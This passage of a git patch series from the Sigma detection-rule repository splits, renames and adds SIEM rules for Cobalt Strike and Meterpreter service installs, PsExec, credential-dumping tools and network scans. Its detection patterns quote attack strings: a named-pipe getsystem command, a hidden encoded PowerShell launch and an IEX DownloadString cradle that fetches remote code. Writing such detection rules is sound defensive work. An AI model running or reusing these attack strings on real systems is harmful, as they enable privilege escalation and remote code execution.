'rundll32' + - '.dll,a' + - '/p:' + condition: selection_id and selection +fields: + - ComputerName + - SubjectDomainName + - SubjectUserName + - ServiceFileName +falsepositives: + - Highly unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml new file mode 100644 index 00000000..db474a96 --- /dev/null +++ b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -0,0 +1,55 @@ +title: Meterpreter or Cobalt Strike Getsystem Service Installation +id: d585ab5a-6a69-49a8-96e8-4a726a54de46 +related: + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation +author: Teymur Kheirkhabarov, Ecco, Florian Roth +date: 2019/10/26 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment + - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +tags: + - attack.privilege_escalation + - attack.t1134 # an old one + - attack.t1134.001 + - attack.t1134.002 +id: d585ab5a-6a69-49a8-96e8-4a726a54de46 +logsource: + product: windows + category: driver_load +detection: + selection: + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - 'cmd' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - '%COMSPEC%' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - 'cmd.exe' + - '/c' + - 'echo' + - '\pipe\' + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + - ImagePath|contains|all: + - 'rundll32' + - '.dll,a' + - '/p:' + condition: selection +fields: + - ComputerName + - SubjectDomainName + - SubjectUserName + - ImagePath +falsepositives: + - Highly unlikely +level: critical \ No newline at end of file From bf9bc03258efd1df23b27d9697102ab9d58c0777 Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Tue, 21 Sep 2021 15:29:28 +0200 Subject: [PATCH 1025/1367] chore: properly name and describe rules --- rules/linux/lnx_clear_syslog.yml | 4 ++-- .../powershell_memorydump_getstoragediagnosticinfo.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/linux/lnx_clear_syslog.yml b/rules/linux/lnx_clear_syslog.yml index 4ca3a5a2..1c01a3a5 100644 --- a/rules/linux/lnx_clear_syslog.yml +++ b/rules/linux/lnx_clear_syslog.yml @@ -1,7 +1,7 @@ -title: Clearing syslog +title: Commands to Clear or Remove the Syslog id: e09eb557-96d2-4de9-ba2d-30f712a5afd3 status: experimental -description: Detects removal of the syslog +description: Detects specific commands commonly used to remove or empty the syslog author: Max Altgelt date: 2021/09/10 references: diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml index a4b975e4..1207ffbf 100644 --- a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml @@ -1,7 +1,7 @@ -title: Live Memory Dump using Get-StorageDiagnosticInfo +title: Live Memory Dump Using Powershell id: cd185561-4760-45d6-a63e-a51325112cae status: experimental -description: Detects a Command used to dump the live memory of a Windows machine +description: Detects usage of a PowerShell command to dump the live memory of a Windows machine date: 2021/09/21 references: - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo From b9d14ef55afffa0ac9455f72ead1f32c594d9267 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 16:02:47 +0200 Subject: [PATCH 1026/1367] split global win_metasploit_or_impacket_smb_psexec_service_install.yml --- ...or_impacket_smb_psexec_service_install.yml | 28 ++++--------- ...or_impacket_smb_psexec_service_install.yml | 40 +++++++++++++++++++ 2 files changed, 48 insertions(+), 20 deletions(-) rename {rules/windows/builtin => rules-unsupported}/win_metasploit_or_impacket_smb_psexec_service_install.yml (85%) create mode 100644 rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml diff --git a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml similarity index 85% rename from rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml rename to rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml index 6b61aec6..2c386e11 100644 --- a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,9 +1,9 @@ -action: global title: Metasploit Or Impacket Service Installation Via SMB PsExec +id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation author: Bartlomiej Czyz, Relativity date: 2021/01/21 -modified: 2021/07/23 +modified: 2021/09/21 references: - https://bczyz1.github.io/2021/01/30/psexec.html tags: @@ -12,7 +12,12 @@ tags: - attack.t1570 - attack.execution - attack.t1569.002 +logsource: + product: windows + service: system detection: + selection: + EventID: 7045 selection_1: ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$' ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' @@ -29,21 +34,4 @@ fields: - ServiceFileName falsepositives: - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name -level: high ---- -id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 - +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml new file mode 100644 index 00000000..8ad72acf --- /dev/null +++ b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml @@ -0,0 +1,40 @@ +title: Metasploit Or Impacket Service Installation Via SMB PsExec +id: 6fb63b40-e02a-403e-9ffd-3bcc1d7494425 +related: + - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 + type: derived +description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation +author: Bartlomiej Czyz, Relativity +date: 2021/01/21 +modified: 2021/07/23 +references: + - https://bczyz1.github.io/2021/01/30/psexec.html +tags: + - attack.lateral_movement + - attack.t1021.002 + - attack.t1570 + - attack.execution + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + selection_1: + ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$' + ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' + ServiceStartType: '3' # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697 + ServiceType: '0x10' + filter: + ServiceName: 'PSEXESVC' + condition: selection and selection_1 and not filter +fields: + - ComputerName + - SubjectDomainName + - SubjectUserName + - ServiceName + - ServiceFileName +falsepositives: + - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name +level: high \ No newline at end of file From 518d294ee91be4c670876d7ddc52020c9bcfb04a Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 16:06:27 +0200 Subject: [PATCH 1027/1367] fix id error --- ...eterpreter_or_cobaltstrike_getsystem_service_installation.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index db474a96..b45519cb 100644 --- a/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -15,7 +15,6 @@ tags: - attack.t1134 # an old one - attack.t1134.001 - attack.t1134.002 -id: d585ab5a-6a69-49a8-96e8-4a726a54de46 logsource: product: windows category: driver_load From dde3b17c20e3a18c30abd019dba0f84d3c66033a Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 16:17:59 +0200 Subject: [PATCH 1028/1367] split global win_mal_service_installs.yml --- .../win_mal_service_installs.yml | 25 ++++---------- .../win_security_mal_service_installs.yml | 34 +++++++++++++++++++ 2 files changed, 40 insertions(+), 19 deletions(-) rename {rules/windows/builtin => rules-unsupported}/win_mal_service_installs.yml (82%) create mode 100644 rules/windows/builtin/win_security_mal_service_installs.yml diff --git a/rules/windows/builtin/win_mal_service_installs.yml b/rules-unsupported/win_mal_service_installs.yml similarity index 82% rename from rules/windows/builtin/win_mal_service_installs.yml rename to rules-unsupported/win_mal_service_installs.yml index e5fcbbab..5afed9f9 100644 --- a/rules/windows/builtin/win_mal_service_installs.yml +++ b/rules-unsupported/win_mal_service_installs.yml @@ -1,9 +1,9 @@ -action: global title: Malicious Service Installations +id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) date: 2017/03/27 -modified: 2021/07/06 +modified: 2021/09/21 references: - https://awakesecurity.com/blog/threat-hunting-for-paexec/ - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html @@ -17,13 +17,6 @@ tags: - car.2013-09-005 - attack.t1543.003 - attack.t1569.002 -detection: - condition: selection and 1 of malsvc_* -falsepositives: - - Penetration testing -level: critical ---- -id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a logsource: product: windows service: system @@ -38,13 +31,7 @@ detection: ServiceFileName|contains: 'net user' malsvc_apt29: ServiceName: 'Java(TM) Virtual Machine Support Service' ---- -id: cb062102-587e-4414-8efa-dbe3c7bf19c6 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 - malsvc_apt29: - ServiceName: 'javamtsup' + condition: selection and 1 of malsvc_* +falsepositives: + - Penetration testing +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_security_mal_service_installs.yml b/rules/windows/builtin/win_security_mal_service_installs.yml new file mode 100644 index 00000000..9071ed8d --- /dev/null +++ b/rules/windows/builtin/win_security_mal_service_installs.yml @@ -0,0 +1,34 @@ +title: Malicious Service Installations +id: cb062102-587e-4414-8efa-dbe3c7bf19c6 +related: + - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a + type: derived +description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. +author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) +date: 2017/03/27 +modified: 2021/09/21 +references: + - https://awakesecurity.com/blog/threat-hunting-for-paexec/ + - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html + - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1003 + - attack.t1035 # an old one + - attack.t1050 # an old one + - car.2013-09-005 + - attack.t1543.003 + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + malsvc_apt29: + ServiceName: 'javamtsup' + condition: selection and 1 of malsvc_* +falsepositives: + - Penetration testing +level: critical \ No newline at end of file From 46febf48b02d442fd85121edc51bddb5e2aeb7ba Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 21 Sep 2021 16:52:02 +0200 Subject: [PATCH 1029/1367] fix: remove rule, too many FPs and no better matching criteria --- .../sysmon_uac_bypass_cleanmgr_tmpfile.yml | 25 ------------------- 1 file changed, 25 deletions(-) delete mode 100644 rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml diff --git a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml deleted file mode 100644 index b5cec569..00000000 --- a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml +++ /dev/null @@ -1,25 +0,0 @@ -title: UAC Bypass Using Cleanmgr Temp File Creation -id: 6a8a8a65-15ac-4722-adb7-c93c213c180a -description: Detects the pattern of UAC bypass using cleanmgr.exe to create temporary files (UACMe 63) -author: Christian Burkard -date: 2021/08/30 -status: experimental -references: - - https://github.com/hfiref0x/UACME -tags: - - attack.defense_evasion - - attack.privilege_escalation - - attack.t1548.002 -logsource: - category: file_event - product: windows -detection: - selection: - Image: 'C:\Windows\system32\cleanmgr.exe' - TargetFilename|startswith: 'C:\Users\' - TargetFilename|contains: '\AppData\Local\Temp\' - TargetFilename|endswith: '.dll' - condition: selection -falsepositives: - - Unknown -level: high From d884f774f9020b45924ff8fbf49fd434e52728f1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 21 Sep 2021 18:01:46 +0200 Subject: [PATCH 1030/1367] Update powershell_memorydump_getstoragediagnosticinfo.yml --- .../powershell_memorydump_getstoragediagnosticinfo.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml index 1207ffbf..c31fc802 100644 --- a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml @@ -15,8 +15,8 @@ detection: dump: EventID: 4104 ScriptBlockText|contains|all: - - Get-StorageDiagnosticInfo - - -IncludeLiveDump + - 'Get-StorageDiagnosticInfo' + - '-IncludeLiveDump' condition: dump falsepositives: - Diagnostics From e20e5033e734271981faeb3a2be3f7ec66615e8a Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Tue, 21 Sep 2021 18:55:48 +0200 Subject: [PATCH 1031/1367] New Rule - Linux - Auditd - Screencapture with Import Tool --- .../lnx_auditd_screencapture_import.yml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_screencapture_import.yml diff --git a/rules/linux/auditd/lnx_auditd_screencapture_import.yml b/rules/linux/auditd/lnx_auditd_screencapture_import.yml new file mode 100644 index 00000000..e411de68 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_screencapture_import.yml @@ -0,0 +1,37 @@ +title: Screen Capture with Import Tool +id: dbe4b9c5-c254-4258-9688-d6af0b7967fd +description: Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/21 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md + - https://attack.mitre.org/techniques/T1113/ + - https://linux.die.net/man/1/import + - https://imagemagick.org/ +logsource: + product: linux + service: auditd +detection: + import: + type: EXECVE + a0: import + import_window_root: + a1: '-window' + a2: 'root' + a3|endswith: + - '.png' + - '.jpg' + - '.jpeg' + import_no_window_root: + a1|endswith: + - '.png' + - '.jpg' + - '.jpeg' + condition: import and (import_window_root or import_no_window_root) +tags: + - attack.collection + - attack.t1113 +falsepositives: + - Legitimate use of screenshot utility +level: low \ No newline at end of file From 06a07605fd4a0bf0a70c819141ddecce013b319e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:31:52 +0200 Subject: [PATCH 1032/1367] split global win_mal_creddumper.yml --- rules/windows/builtin/win_mal_creddumper.yml | 40 +++-------------- .../builtin/win_security_mal_creddumper.yml | 44 +++++++++++++++++++ .../driver_load_mal_creddumper.yml | 40 +++++++++++++++++ 3 files changed, 91 insertions(+), 33 deletions(-) create mode 100644 rules/windows/builtin/win_security_mal_creddumper.yml create mode 100644 rules/windows/driver_load/driver_load_mal_creddumper.yml diff --git a/rules/windows/builtin/win_mal_creddumper.yml b/rules/windows/builtin/win_mal_creddumper.yml index 76cc287b..96e39a84 100644 --- a/rules/windows/builtin/win_mal_creddumper.yml +++ b/rules/windows/builtin/win_mal_creddumper.yml @@ -1,5 +1,5 @@ -action: global title: Credential Dumping Tools Service Execution +id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 @@ -18,18 +18,13 @@ tags: - attack.t1035 # an old one - attack.t1569.002 - attack.s0005 +logsource: + product: windows + service: system detection: selection: - - ServiceName|contains: - - 'fgexec' - - 'wceservice' - - 'wce service' - - 'pwdump' - - 'gsecdump' - - 'cachedump' - - 'mimikatz' - - 'mimidrv' - - ImagePath|contains: + EventID: 7045 + ImagePath|contains: - 'fgexec' - 'dumpsvc' - 'cachedump' @@ -40,25 +35,4 @@ detection: condition: selection falsepositives: - Legitimate Administrator using credential dumping tool for password recovery -level: high ---- -id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 -logsource: - product: windows - category: driver_load ---- -id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_security_mal_creddumper.yml b/rules/windows/builtin/win_security_mal_creddumper.yml new file mode 100644 index 00000000..dce5b9e8 --- /dev/null +++ b/rules/windows/builtin/win_security_mal_creddumper.yml @@ -0,0 +1,44 @@ +title: Credential Dumping Tools Service Execution +id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 +related: + - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed + type: derived +description: Detects well-known credential dumping tools execution via service execution events +author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +date: 2017/03/05 +modified: 2021/03/18 +references: + - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment +tags: + - attack.credential_access + - attack.execution + - attack.t1003 # an old one + - attack.t1003.001 + - attack.t1003.002 + - attack.t1003.004 + - attack.t1003.005 + - attack.t1003.006 + - attack.t1035 # an old one + - attack.t1569.002 + - attack.s0005 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + ImagePath|contains: + - 'fgexec' + - 'dumpsvc' + - 'cachedump' + - 'mimidrv' + - 'gsecdump' + - 'servpw' + - 'pwdump' + condition: selection +falsepositives: + - Legitimate Administrator using credential dumping tool for password recovery +level: high + + + diff --git a/rules/windows/driver_load/driver_load_mal_creddumper.yml b/rules/windows/driver_load/driver_load_mal_creddumper.yml new file mode 100644 index 00000000..64f7a024 --- /dev/null +++ b/rules/windows/driver_load/driver_load_mal_creddumper.yml @@ -0,0 +1,40 @@ +title: Credential Dumping Tools Service Execution +id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 +related: + - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed + type: derived +description: Detects well-known credential dumping tools execution via service execution events +author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +date: 2017/03/05 +modified: 2021/03/18 +references: + - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment +tags: + - attack.credential_access + - attack.execution + - attack.t1003 # an old one + - attack.t1003.001 + - attack.t1003.002 + - attack.t1003.004 + - attack.t1003.005 + - attack.t1003.006 + - attack.t1035 # an old one + - attack.t1569.002 + - attack.s0005 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|contains: + - 'fgexec' + - 'dumpsvc' + - 'cachedump' + - 'mimidrv' + - 'gsecdump' + - 'servpw' + - 'pwdump' + condition: selection +falsepositives: + - Legitimate Administrator using credential dumping tool for password recovery +level: high From d37685d7cc5b107dbd4fef19e62b66881b0fa490 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:36:34 +0200 Subject: [PATCH 1033/1367] split global win_cobaltstrike_service_installs.yml --- .../win_cobaltstrike_service_installs.yml | 48 ++++++++----------- ...security_cobaltstrike_service_installs.yml | 43 +++++++++++++++++ 2 files changed, 62 insertions(+), 29 deletions(-) create mode 100644 rules/windows/builtin/win_security_cobaltstrike_service_installs.yml diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index ca2308ab..6dbf836f 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -1,5 +1,5 @@ -action: global title: CobaltStrike Service Installations +id: 5a105d34-05fc-401e-8553-272b45c1522d description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement author: Florian Roth, Wojciech Lesicki references: @@ -7,6 +7,7 @@ references: - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/05/26 +modified: 2021/09/21 tags: - attack.execution - attack.privilege_escalation @@ -14,37 +15,26 @@ tags: - attack.t1021.002 - attack.t1543.003 - attack.t1569.002 -detection: - selection1: - ServiceFileName|contains|all: - - 'ADMIN$' - - '.exe' - selection2: - ServiceFileName|contains|all: - - '%COMSPEC%' - - 'start' - - 'powershell' - selection3: - ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand' - selection4: - ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" - condition: selection_id and (selection1 or selection2 or selection3 or selection4) -falsepositives: - - Unknown -level: critical ---- -id: 5a105d34-05fc-401e-8553-272b45c1522d logsource: product: windows service: system detection: selection_id: EventID: 7045 ---- -id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 -logsource: - product: windows - service: security -detection: - selection_id: - EventID: 4697 \ No newline at end of file + selection1: + ImagePath|contains|all: + - 'ADMIN$' + - '.exe' + selection2: + ImagePath|contains|all: + - '%COMSPEC%' + - 'start' + - 'powershell' + selection3: + ImagePath|contains: 'powershell -nop -w hidden -encodedcommand' + selection4: + ImagePath|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + condition: selection_id and (selection1 or selection2 or selection3 or selection4) +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_security_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_security_cobaltstrike_service_installs.yml new file mode 100644 index 00000000..859a9d20 --- /dev/null +++ b/rules/windows/builtin/win_security_cobaltstrike_service_installs.yml @@ -0,0 +1,43 @@ +title: CobaltStrike Service Installations +id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 +related: + - id: 5a105d34-05fc-401e-8553-272b45c1522d + type: derived +description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement +author: Florian Roth, Wojciech Lesicki +references: + - https://www.sans.org/webcasts/119395 + - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ + - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ +date: 2021/05/26 +modified: 2021/09/21 +tags: + - attack.execution + - attack.privilege_escalation + - attack.lateral_movement + - attack.t1021.002 + - attack.t1543.003 + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + selection_id: + EventID: 4697 + selection1: + ServiceFileName|contains|all: + - 'ADMIN$' + - '.exe' + selection2: + ServiceFileName|contains|all: + - '%COMSPEC%' + - 'start' + - 'powershell' + selection3: + ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand' + selection4: + ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + condition: selection_id and (selection1 or selection2 or selection3 or selection4) +falsepositives: + - Unknown +level: critical \ No newline at end of file From b5e91d7185247dfe96063573f7e3707292ee6164 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:41:46 +0200 Subject: [PATCH 1034/1367] fix field name and date --- rules/windows/builtin/win_mal_creddumper.yml | 2 +- rules/windows/builtin/win_security_mal_creddumper.yml | 4 ++-- rules/windows/driver_load/driver_load_mal_creddumper.yml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/builtin/win_mal_creddumper.yml b/rules/windows/builtin/win_mal_creddumper.yml index 96e39a84..e7dd86a0 100644 --- a/rules/windows/builtin/win_mal_creddumper.yml +++ b/rules/windows/builtin/win_mal_creddumper.yml @@ -3,7 +3,7 @@ id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/03/18 +modified: 2021/09/21 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: diff --git a/rules/windows/builtin/win_security_mal_creddumper.yml b/rules/windows/builtin/win_security_mal_creddumper.yml index dce5b9e8..d3053669 100644 --- a/rules/windows/builtin/win_security_mal_creddumper.yml +++ b/rules/windows/builtin/win_security_mal_creddumper.yml @@ -6,7 +6,7 @@ related: description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/03/18 +modified: 2021/09/21 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: @@ -27,7 +27,7 @@ logsource: detection: selection: EventID: 4697 - ImagePath|contains: + ServiceFileName|contains: - 'fgexec' - 'dumpsvc' - 'cachedump' diff --git a/rules/windows/driver_load/driver_load_mal_creddumper.yml b/rules/windows/driver_load/driver_load_mal_creddumper.yml index 64f7a024..5ff88625 100644 --- a/rules/windows/driver_load/driver_load_mal_creddumper.yml +++ b/rules/windows/driver_load/driver_load_mal_creddumper.yml @@ -6,7 +6,7 @@ related: description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/03/18 +modified: 2021/09/21 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: From 00f3055035d0a6ca6d41fbba4a4e7ccd48c0d8ee Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:47:28 +0200 Subject: [PATCH 1035/1367] split global net_susp_network_scan.yml --- rules/network/net_susp_network_scan_by_ip.yml | 26 +++++++++++++++ ....yml => net_susp_network_scan_by_port.yml} | 33 +++++++------------ 2 files changed, 38 insertions(+), 21 deletions(-) create mode 100644 rules/network/net_susp_network_scan_by_ip.yml rename rules/network/{net_susp_network_scan.yml => net_susp_network_scan_by_port.yml} (69%) diff --git a/rules/network/net_susp_network_scan_by_ip.yml b/rules/network/net_susp_network_scan_by_ip.yml new file mode 100644 index 00000000..518b5d68 --- /dev/null +++ b/rules/network/net_susp_network_scan_by_ip.yml @@ -0,0 +1,26 @@ +title: Network Scans Count By Destination IP +id: 4601eaec-6b45-4052-ad32-2d96d26ce0d8 +status: experimental +description: Detects many failed connection attempts to different ports or hosts +author: Thomas Patzke +date: 2017/02/19 +modified: 2020/08/27 +logsource: + category: firewall +tags: + - attack.discovery + - attack.t1046 +detection: + selection: + action: denied + timeframe: 24h + condition: selection | count(dst_ip) by src_ip > 10 +falsepositives: + - Inventarization systems + - Vulnerability scans + - Penetration testing activity +level: medium +fields: + - src_ip + - dst_ip + - dst_port \ No newline at end of file diff --git a/rules/network/net_susp_network_scan.yml b/rules/network/net_susp_network_scan_by_port.yml similarity index 69% rename from rules/network/net_susp_network_scan.yml rename to rules/network/net_susp_network_scan_by_port.yml index a4032fda..e3cc1f86 100644 --- a/rules/network/net_susp_network_scan.yml +++ b/rules/network/net_susp_network_scan_by_port.yml @@ -1,35 +1,26 @@ -action: global -title: Network Scans +title: Network Scans Count By Destination Port +id: fab0ddf0-b8a9-4d70-91ce-a20547209afb status: experimental description: Detects many failed connection attempts to different ports or hosts author: Thomas Patzke date: 2017/02/19 -modified: 2020/08/27 +modified: 2021/09/21 logsource: category: firewall -fields: - - src_ip - - dst_ip - - dst_port -falsepositives: - - Inventarization systems - - Vulnerability scans - - Penetration testing activity -level: medium tags: - attack.discovery - attack.t1046 ---- -id: fab0ddf0-b8a9-4d70-91ce-a20547209afb detection: selection: action: denied timeframe: 24h condition: selection | count(dst_port) by src_ip > 10 ---- -id: 4601eaec-6b45-4052-ad32-2d96d26ce0d8 -detection: - selection: - action: denied - timeframe: 24h - condition: selection | count(dst_ip) by src_ip > 10 \ No newline at end of file +falsepositives: + - Inventarization systems + - Vulnerability scans + - Penetration testing activity +level: medium +fields: + - src_ip + - dst_ip + - dst_port \ No newline at end of file From 6777ca7a825c90a2c72e858d58fe13b1f10cdc34 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:51:11 +0200 Subject: [PATCH 1036/1367] split global net_high_dns_requests_rate.yml --- .../net_firewall_high_dns_requests_rate.yml | 24 +++++++++++++++++++ rules/network/net_high_dns_requests_rate.yml | 21 ++++------------ 2 files changed, 29 